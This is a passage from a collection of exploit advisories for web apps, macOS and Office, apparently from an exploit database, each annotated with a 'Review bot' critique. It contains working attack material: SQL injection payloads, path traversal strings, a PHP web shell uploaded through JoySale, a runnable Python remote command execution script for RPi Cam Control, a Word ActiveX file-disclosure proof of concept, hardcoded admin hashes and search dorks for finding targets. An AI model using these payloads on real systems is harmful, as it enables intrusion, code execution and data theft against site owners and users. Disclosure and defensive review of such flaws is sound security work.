echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
EOF
The following javascript code will alert the /etc/passwd file on the victim's computer:
BOF
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
alert(xhr.responseText);
}
};
xhr.send();
EOF
Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this
exploitation process it's not an issue since .webloc files are always opened with Safari.
NOTE
This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this
bug in Apple's changelog.
No CVE has been assigned by Apple.
SOLUTION
Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html.
Safari 11 (available for Mac OS X 10.11, 10.12 and 10.13) introduces the following security henancement:
"CORS and cross origin access from file:// are now blocked unless Disable Local File Restrictions is selected from the Develop menu"
hence the above exploit will not work against updated versions of OSX El Capitan and Sierra. However javascript execution outside quarantine is still possible.
REFERENCES
https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html <https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html>
DISCLOSURE
This vulnerability has been disclosed thru Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd <http://www.beyondsecurity.com/ssd>
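Review bot: the SOLUTION advice to 'simply remove rhtmlPlayer.html' is not actionable on two of the three listed versions: `/System/Library/CoreServices/HelpViewer.app` sits under System Integrity Protection on 10.11 and 10.12, so the file can't be deleted without first disabling SIP, which weakens the system more than this bug does; the practical mitigation for those releases is the Safari 11 update the same section already cites, and 10.10 is left without one. Also, 'The code below contains two different DOM Based XSS' describes the snippet above it, and 'henancement' should read 'enhancement'.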

platforms/php/webapps/42164.txt Executable file

@ -0,0 +1,15 @@
# Exploit Title: Nuevo mailer version <= 6.0 SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and below
# Tested on: Linux
Vulnerable script: rdr.php
Vulnerable parameter: r
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
NB: vendor has been notified.
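Review bot: `NB: vendor has been notified.` is the only disclosure information; there is no notification date, vendor response or fixed version, and nothing supports the `<= 6.0` range beyond `# Version: 6.0 and below`, so add the timeline and the release that fixes `rdr.php` once known. The `# Google Dork: inurl:/inc/rdr.php?` line is a finding aid with no defensive value and adds nothing to the advisory.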

platforms/php/webapps/42317.txt Executable file

@ -0,0 +1,17 @@
# Exploit Title: Sabai Discuss Wordpress Plugin Stored XSS vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Software demo : https://sabaidiscuss.com/
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : User Your Mind ! :D
# Video Demo : https://youtu.be/QETN6cvBMoM
# Email : Black.king066@gmail.com
# Special thanks to Mr alireza ajami
1- Create new question
http://localhost/wordpress/questions/ask
2- Insert XSS Code in Title Field
3- Enjoy it!
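Review bot: the entry names no affected or fixed plugin version (there is no `# Version:` line, only a demo URL and a video), so it can't be matched to a Sabai Discuss release or checked by a site owner, and it records no vendor notification; `# Dork : User Your Mind ! :D` is filler that should go. The three steps also don't say whether the question form is reachable by unauthenticated visitors or only by registered users, which determines who can plant the stored payload.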

platforms/php/webapps/42348.txt Executable file

@ -0,0 +1,99 @@
# Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
# Date: July 7th, 2017
# Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.tildenetwork.com/
# Version: Tilde CMS 1.0.1
# Tested on: Ubuntu 12.04, PHP 5.3.10
I. INTRODUCTION
========================================================================
Tilde CMS is closed-source content management system created by
tildenetwork.com
II. DESCRIPTION
========================================================================
The web application suffers of multiple vulnerabilities.
1. SQL Injection
------------------------------------------------------------------------
Due to missing escaping of the backtick character, the following query in
the source code is vulnerable:
[class.SystemAction.php]
$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);
The vulnerability can be trigged via a POST request as shown in the
following PoC:
POST /actionphp/action.input.php HTTP/1.1
ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE
SLEEP(5)-- aaa &idForm=1234567890
The resulting query on the server-side will be:
SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'
For a succesful exploitation, the table "form_table_1" must be valid.
2. Path Traversal
------------------------------------------------------------------------
The vulnerabilty exists on this method:
GET /actionphp/download.File.php?&file=../../../../../../etc/passwd
3. Arbitrary Files Upload
------------------------------------------------------------------------
It is possible to bypass the implemented restrictions shown in the
following snippet of the code:
$file=$_FILES['file'.$i]['tmp_name'];
if (($file!="")&&($file!="none")) {
$source_file=$file;
$file_name=$_FILES['file'.$i]['name'];
$file_name=str_replace(".php",".txt",$file_name);
$file_name=str_replace(" ","_",$file_name);
$file_name=str_replace("+","",$file_name);
A file named "filename.+php" will be renamed in "filename.php", therefore
successfully uploaded.
4. Insecure Direct Object References
------------------------------------------------------------------------
It is possible to retrieve sensitive resources by using direct references.
A low privileged user can load the PHP resources such as:
admin/content.php
admin/content.php?method=ftp_upload
IV. BUSINESS IMPACT
========================================================================
These flaws may compromise the integrity of the system and/or expose
sensitive information.
V. SYSTEMS AFFECTED
========================================================================
Tilde CMS 1.01 is vulnerable (probably all previous versions)
VI. VULNERABILITY HISTORY
========================================================================
July 6th, 2017: Vulnerability identification
July 7th, 2017: Vendor notification
July 13th, 2017: Vendor notification
VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this
information.
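Review bot: the section numbering jumps from `II. DESCRIPTION` to `IV. BUSINESS IMPACT` with no section III, the version appears as both `Tilde CMS 1.01` and `Tilde CMS 1.0.1`, and the history lists `Vendor notification` twice (July 7th and July 13th) with no vendor reply or fix recorded, so the entry should state that the issues were unpatched at publication. Several typos ('trigged', 'succesful', 'vulnerabilty', 'misuseof') are worth a pass before archiving.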

platforms/php/webapps/42410.txt Executable file

@ -0,0 +1,139 @@
JoySale Arbitrary File Upload
# Exploit Title: JoySale Arbitrary File Upload
# Exploit Author: Mutlu Benmutlu
# Date: 1/08/2017
# Vendor Homepage: http://www.hitasoft.com/product/joysale-advanced-classifieds-script/
# Version: Joysale v2.2.1 (latest)
# Google Dork: "joysale-style.css"
# Tested on : MacOS Sierra 10.12.5 / Kali Linux
Details
=======
Vendor informed about vulnerability, they are going to release fix. Joysale v2.2.1 (latest version) vulnerable to attack.
While uploading image file, you can change the content in it, there is only user controls for file type.
After you post vulnerable code via file upload, server saves your file in temp folder
========================================
Vulnerable Page:
========================================
http://xxxxxxxxx.com/products/create
========================================
Vulnerable POST REQUEST:
========================================
POST /item/products/upload/QZP83N70 HTTP/1.1
Host: xxxxxxxxx.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Referer: https://xxxxxxxxx.com/products/create
Content-Length: 2054
Content-Type: multipart/form-data; boundary=---------------------------1321235123106179646780168
Cookie: PHPSESSID=b6ah8xxxxxxx9k4pqvr4; useridval=user%40mailaddress.com
Connection: close
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="XUploadForm[file]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[category]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[subCategory]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[name]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[description]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[price]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[currency]"
€-EUR
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[location]"
28108 Alcobendas, Spain
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[latitude]"
40.534915100000006
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[longitude]"
-3.616368599999987
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="facebook_share"
1
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[promotion][type]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[promotion][addtype]"
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="Products[uploadSessionId]"
QZP83N70
-----------------------------1321235045961106179646780168
Content-Disposition: form-data; name="XUploadForm[file]"; filename="ab.php"
Content-Type: image/png
<?php echo shell_exec($_GET[e]); ?>
-----------------------------1321235045961106179646780168--
========================================
Vulnerable POST RESPONSE:
========================================
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jul 2017 13:50:18 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.0.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept
X-Powered-By: Linux
MS-Author-Via: DAV
Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
Content-Length: 306
[{"name”:”ab.php","type":"image\/png","size": 306,"url":"\/media\/item\/tmp\/f99aaeasde51c890402b0fda9408.php","thumbnail_url":"\/media\/item\/tmp\/\/f99aaeasde51c890402b0fda9408.php","delete_url":"\/products\/upload?_method=delete&file= f99aaeasde51c890402b0fda9408.php","delete_type":"POST"}]
========================================
Vulnerable UPLOADED FILE PATH
========================================
http://xxxxxxxxx.com/media/item/tmp/f99aaeasde51c890402b0fda9408.php
========================================
Vulnerable Code Execution (example)
========================================
http://xxxxxxxxx.com/media/item/tmp/f99aaeasde51c890402b0fda9408.php?e=cat+/etc/passwd
Enjoy.
Mutlu Benmutlu
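Review bot: the captured request can't be parsed as shown: the `Content-Type` header declares `boundary=---------------------------1321235123106179646780168` while every part in the body uses `-----------------------------1321235045961106179646780168`, and the response JSON contains curly quotes in `"name”:”ab.php"`, so the transcript was edited by hand and should be re-captured or marked as reconstructed. The Details paragraph says the vendor 'are going to release fix' but gives no notification date or fixed version, which is what a JoySale operator needs.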

platforms/php/webapps/42452.py Executable file

@ -0,0 +1,65 @@
#####
# RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Date 16/08/2017
# Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
#
# Proof of concept:
#####
#!/usr/bin/python
import requests
import sys
if not len(sys.argv[2:]):
print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
exit(1)
def GET(target, rfile):
res = requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
return res.content
def RCE(target, command):
requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
return GET(target,'/tmp/output.txt')
target = sys.argv[1]
command = sys.argv[2]
print RCE(target,command)
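Review bot: the `#!/usr/bin/python` line sits after the 40-line comment banner rather than on line 1, so the kernel ignores it and the file can't be run directly despite being committed as an executable; the shebang belongs at the top. The header gives no vendor response or fixed version for `<= v6.3.14`. For anyone examining a camera, the PoC's footprint is a `/tmp/output.txt` file written by the injected `convertCmd` and a `download1` path ending in `.v0000.t`, both worth listing as indicators.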

platforms/php/webapps/42516.txt Executable file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: iTech Movie Script 7.51 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : http://itechscripts.com/
# Software Link: http://itechscripts.com/movie-portal-script/
# Demo: http://movie-portal.itechscripts.com/
# Version: 7.51
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/movie.php?f=[SQL]
# -9+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x2833429)--+-
#
# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
#
# http://localhost/[PATH]/tvshow.php?s=[SQL]
#
# Etc...
# # # # #
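Review bot: `# The vulnerability allows an attacker to inject sql commands....` and the closing `# Etc...` leave the finding under-documented: only `movie.php?f=` carries a payload, `show_misc_video.php?id=` and `tvshow.php?s=` are bare `[SQL]` placeholders, and no further parameters are named, so state the full list of affected parameters and whether the vendor was notified (the header has `# CVE: N/A` and no disclosure line).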

platforms/php/webapps/42577.txt Executable file

@ -0,0 +1,34 @@
# Exploit Title: CMS Web-Gooroo <=1.141 - Multiple Vulnerabilities
# Date: 01-06-2017
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Vendor Homepage: http://web.archive.org/web/20120510194357/http://www.web-gooroo.com/
# Software Link: https://github.com/andrey-buligin/hanna/tree/master/wbg
# Version: <=1.141
# Category: webapps
1. SQL Injection
File: /wbg/core/_includes/authorization.inc.php
Vulnerable code:
$SQL_query = 'SELECT * FROM wbg_users WHERE (login=\'' . $_POST['wbg_login'] . '\') AND (password=\'' . md5(md5($_POST['wbg_password'])) . '\')';
$USER = mysql_fetch_assoc(mysql_query($SQL_query));
2. Hardcoded admin user
File: /wbg/core/_includes/authorization.inc.php
Vulnerable code:
if ((md5($_POST['wbg_login']) == '2d626704807d4c5be1b46e85c4070fec') && (md5($_POST['wbg_password']) == '2967a371178d713d3898957dd44786af')) {
$USER = $this->get_megaadmin();
}
2d626704807d4c5be1b46e85c4070fec - mayhem
2967a371178d713d3898957dd44786af - no success in bruteforce, though...
3. Full path disclosure
Almost any file, because of lack of input validation and overall bad design.
CMS log file (besides DB log) location with full path and debug info:
/wbg/tmp/logs/syslog.log.php
4. Unrestricted file upload
Can be done via admin panel as attachment to any publication. No file type checking is performed.
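Review bot: item 1 of this hunk shows $_POST['wbg_login'] concatenated unescaped into the SELECT but gives no remediation; the fix to record is a prepared statement for the login query (mysql_query()/mysql_fetch_assoc() are also removed in PHP 7) and password_hash()/password_verify() instead of the unsalted md5(md5()) storage. Item 2 reads as if the hardcoded account only matters once the second hash is cracked; it should state plainly that the get_megaadmin() branch is a backdoor shared by every installation and must be deleted regardless. Item 3 names /wbg/tmp/logs/syslog.log.php as holding full paths and debug info but does not say whether the file is served to unauthenticated clients, which is the detail that decides severity. The Date field "01-06-2017" is ambiguous between 1 June and 6 January.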

23
platforms/php/webapps/42595.txt Executable file

@ -0,0 +1,23 @@
# Exploit Title: PHP-SecureArea <= v2.7 - SQL Injection
# Date: 30-08-2017
# Exploit Author: Cryo
# Contact: https://twitter.com/KernelEquinox
# Vendor Homepage: https://www.withinweb.com
# Software Link: https://www.withinweb.com/phpsecurearea/
# Version: 2.7 and below
# Tested on: Windows, Linux, Mac OS X
1. Description
==============
PHP-SecureArea is vulnerable to SQL injection due to lack of input sanitization in the misc.php file.
2. Proof of Concept
===================
POST /phpsecurearea/ipn/process.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
item_number=-1' UNION ALL SELECT 1-- -
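Review bot: the Description in this hunk attributes the missing input sanitisation to misc.php, but the only PoC request is a POST to /phpsecurearea/ipn/process.php with the item_number parameter, so the affected file and parameter contradict each other; reconcile them (or list both sinks with their parameters) and add the remediation, a prepared statement with item_number bound as a parameter. The request is also incomplete as an HTTP/1.1 message (no Content-Length), which makes it harder to reproduce or to write a detection rule from.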

132
platforms/windows/local/42930.txt Executable file

@ -0,0 +1,132 @@
Title: MS Office Word Information Disclosure Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007 32-bits (x86)
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
CVE: N/A
Description:
MS Office Word contains an Internet Explorer (IE) Script execution issue through a currently well known vector:
The "Microsoft Scriptlet Component" ActiveX.
Originally found by info sec. researcher Juan Pablo Lopez Yacubian and made public on May, 2008, this issue
allowed web pages to be displayed, inline, in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft didn´t think it would be suitable to disable the ActiveX,
back in 2008, for some unknown reason; Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference itself, as HTML, potentially
disclosing sensitive information to malicious attackers, like file contents, the Windows user name, etc..
The PoC below will display, on an alert box, the contents of 'WindowsUpdate.log', that, depending on the
Windows patch level, used to be located on "c:\windows" directory, but currently it resides in the user
that applied the updates directory:
c:\users\%username%\AppData\Local\Microsoft\Windows
Instructions:
a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
b) Download it using your prefered web browser, and save it to one of your user´s profile subfolders.
(Could be the home directory too, however nowadays most browsers by default will save the file to the
'Downloads' folder.
c) Open and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice you
can pick up any file as long as you know the full path.
Important: the file must be downloaded and forced in the "Internet Zone" of IE, through the mark of
the web, which is appended by several programs to files downloaded from the web.
-------------Disclose_File.WPS------------------------------------------------------------
<html><body>
<!-- if you want another file name for the Word/Works document, overwrite the 'Disclose_File.wps' with
the file name you wish -->
<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>
<script language=javascript>
var loc = document.location.href.toLowerCase();
var locNoProtocol = loc.substring(8,loc.length);
var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1+1);
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2+1);
var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3+1);
var usr = locNoProtocol.substring(b3+1,b4); // returns the Windows user name, when this document is referenced
// through the default "C$" share.
var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
// change the above path to match another file you wish to grab the contents.
var t = loc.indexOf("c:"); // Assuming the drive letter for Windows install, including the user´s profile is 'c:'
var tr = loc.indexOf("c$");
if (t != -1)
{
var ns = loc.substring(t+2,loc.length);
document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
}
else if (tr != -1)
{
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",fileToDisclose,0);
x.Send();
fileContents = x.ResponseText;
alert(fileContents);
}
</script>
</body>
</html>
-------------------------------------------------------------------------------------------------------------------
Vulnerable: MS Office 2007
MS Office 2010,2013,2016 have killbitted this ActiveX through specific MS Office killbit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.
Tested on: Any Windows version that suppors Office 2007.
Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
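Review bot: the header's "Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP" and the closing "Tested on: Any Windows version that suppors Office 2007" (typo: supports) say the same thing twice in different words; keep one. The mitigation is only implied: the advisory records that Office 2010/2013/2016 killbit the Scriptlet Component (CLSID AE24FDAE-03C6-11D1-8B76-0080C744F389) through Office-specific killbit settings, and the "Important" paragraph shows the technique depends on the downloaded file carrying the mark of the web and on the script locating the profile through the C$ path. A Mitigation section should state this directly: the same Office ActiveX killbit for that CLSID is the workaround for Office 2007, and the hardcoded "c:" drive-letter assumption flagged in the script comment is a condition worth listing next to the mark-of-the-web one.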


@ -0,0 +1,89 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Man-in-the-Middle (MITM) Remote Code Execution
CVE Reference:
==============
CVE-2017-14084
Security Issue:
===============
MITM vector exists as the CURL request used by Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set to false.
CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine.
CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want to talk to...
References:
===========
https://success.trendmicro.com/solution/1118372
Vulnerable code snippet...
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0); <=================== HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0); <==================== THERE
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=================================
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
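Review bot: the Security Issue sentence describing CURLOPT_SSL_VERIFYPEER is garbled ("that you trust was issued by a CA you trust and it's genuine"), and the prose says both options are "set to false" while the snippet sets them to 0; state it once: VERIFYPEER=0 disables certificate-chain validation and VERIFYHOST=0 disables hostname matching, so any certificate is accepted by Send() in HttpTalk.php. The fix worth recording beside the vendor link is curl_setopt($h, CURLOPT_SSL_VERIFYPEER, true) and curl_setopt($h, CURLOPT_SSL_VERIFYHOST, 2) with CURLOPT_CAINFO pointing at the trusted bundle (2 is the only strict VERIFYHOST setting). The "*" after "XG (12.0)" has no footnote, and the Disclosure Timeline mixes "Label: date" and "date : Label" ordering.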